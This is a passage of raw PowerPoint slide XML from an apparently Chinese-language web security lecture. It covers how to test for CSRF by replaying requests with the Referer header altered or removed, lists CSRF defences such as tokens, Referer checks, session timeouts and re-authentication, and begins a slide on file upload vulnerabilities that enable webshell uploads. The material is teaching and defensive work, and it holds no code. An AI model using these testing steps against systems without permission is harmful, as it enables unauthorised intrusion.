              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>并验证后台是否有 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>限制。可以使用工具抓</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>包</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，然后修</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>改</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>删除</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>后重</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>放</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，查 看是否可以正常提</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>交</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" marR="36195" indent="-138430">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="250"/>
              </a:spcBef>
              <a:buSzPct val="93333"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）确认</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Coo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ki</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的有效性。查看退出或者关闭浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>后</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，是否存</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ess</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>没有过期的情</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>况</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>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621993"/>
            <a:ext cx="80645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预防</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262767" y="880276"/>
            <a:ext cx="3388995" cy="881380"/>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预防</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>CS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>攻击不像预防其他漏洞那样复杂，只需要在网站的关键部分增加一些操 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>作就可以防御</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>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1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>验证用户提交数据的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>信息。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="160"/>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2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>对关键操作增加</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>参数</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>值必须随机，每次都不一样。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="165"/>
              </a:spcBef>
              <a:buSzPct val="93333"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>设置会话过期机制，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>分钟内用户无操作，则自动退出登录。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" marR="59690" indent="-138430">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="265"/>
              </a:spcBef>
              <a:buSzPct val="93333"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）敏感信息修改时需要对用户身份进行二次认证，比如修改账号、支付 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>操作等。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>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9</a:t>
            </a:r>
            <a:endParaRPr sz="1250">
              <a:latin typeface="等线"/>
              <a:cs typeface="等线"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="201561" y="408305"/>
            <a:ext cx="4384675" cy="2465070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4384675" h="2465070">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="2465070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4384662" y="2465070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4384662" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="191B0E"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3134233" y="2462657"/>
            <a:ext cx="1031240" cy="137160"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1031239" h="137160">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="137159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031240" y="137159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031239" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EFEDE3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4165473" y="1014857"/>
            <a:ext cx="146050" cy="1584960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="146050" h="1584960">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1584960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146050" y="1584960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146050" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EFEDE3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="207657" y="414401"/>
            <a:ext cx="4371975" cy="2452370"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:ln w="12953">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="3300">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="45"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="3900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1724660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2550" spc="35">
                <a:solidFill>
                  <a:srgbClr val="EFEDE3"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>文件上传漏洞</a:t>
            </a:r>
            <a:endParaRPr sz="2550">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>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3388360" cy="1163955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="19050" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="96400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>由于业务功能的需要，大多</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站点都有文件上传的功能，例如用户注册时可以 上传头像、证件信息等。若</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应用程序在处理用户上传的文件时没有判断文件 的扩展名是否在允许的范围内就直接把文件保存在服务器上，这样就给攻击者往 服务器上传具有破坏性的程序开启了大门。文件上传漏洞就是指由于程序员在用 户文件上传功能方面的控制不足或处理缺陷而导致的用户可以越过其本身权限向 服务器上传可执行的动态脚本文件。这些上传的文件可以是木马、病毒、恶意脚 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>本或者</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ebS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
